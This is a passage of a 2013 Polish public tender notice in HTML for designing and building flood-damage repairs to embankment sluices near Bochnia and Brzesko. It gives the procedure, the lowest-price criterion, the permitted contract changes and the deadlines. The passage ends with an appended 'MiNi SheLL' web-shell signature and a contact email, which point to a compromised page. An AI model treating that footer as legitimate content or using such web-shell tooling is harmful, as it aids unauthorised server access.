<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>NIE DOTYCZY</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają możliwość zmiany treści umowy w następujących przypadkach:
a.zmiany w KRS, wpisie do ewidencji działalności gospodarczej lub (CEIDG)  w trakcie realizacji zamówienia;
b.zmiany kont bankowych,
c.wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy,
d.w przypadku ustawowej zmiany stawki podatku od towarów i usług na przedmiot umowy, cena brutto określona w umowie za okresy realizacji umowy przypadające po wprowadzeniu zmienionej stawki podatku od towarów i usług ulegnie odpowiedniej zmianie, w taki sposób, aby wynikająca z umowy cena netto pozostała niezmieniona,
e.obniżenia wynagrodzenia, o którym mowa w § 2 ust.1
f.zmian technicznych i technologicznych (roboty zamienne)
g.zmian regulacji prawnych obowiązujących w dniu podpisania umowy lub po jej podpisaniu,
h.zgodnie z art. 144 ust.1 ustawy Prawo zamówień publicznych - dopuszcza się możliwość wprowadzenia innych, nieistotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy
i.zmiany harmonogramu rzeczowo - finansowego w sytuacji wystąpienia okoliczności niezależnych od Wykonawcy i udokumentowanych w formie pisemnej a mających wpływ na harmonogram.
j.zmiany kluczowego personelu wykonawcy, zamawiającego lub podwykonawcy, w wypadku wystąpienia okoliczności uniemożliwiających dalsze pełnienie tych funkcji, 	
2. Zmiana terminu wykonania przedmiotu zamówienia będzie możliwa wyłącznie w przypadku:
a)zdarzeń losowych tj. podtopienia placu budowy spowodowanego powodzią lub intensywnymi opadami deszczu tylko jeśli uniemożliwia to prowadzenie robót.
b)zmiany harmonogramu rzeczowo - finansowego w sytuacji wystąpienia okoliczności niezależnych od Wykonawcy i udokumentowanych w formie pisemnej a mających wpływ na harmonogram.
c)konieczności wykonania robót zamiennych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego w Tarnowie przy ul. Ostrogskich 5,pok. nr 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2013 godzina 09:30, miejsce: W siedzibie Zamawiającego w Tarnowie przy ul. Ostrogskich 5 w sekretariacie pok. nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Na zaprojektowanie i wykonanie robót budowlanych dla zadań pn.: Usuwanie szkód powodziowych na prawym wale potoku Gróbka - śluza wałowa w km 20+410 w msc. Gawłów, gm. Bochnia, pow. bocheński..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamieszczony w części ogólnej ogłoszenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Na zaprojektowanie i wykonanie robót budowlanych dla zadań pn: Usuwanie szkód powodziowych na prawym wale rzeki Wisły - śluza wałowa nr 5 w km 17+120 w msc. Dąbrówka Morska, gm. Szczurowa, pow. brzeski..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamieszczony w części ogólnej ogłoszenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com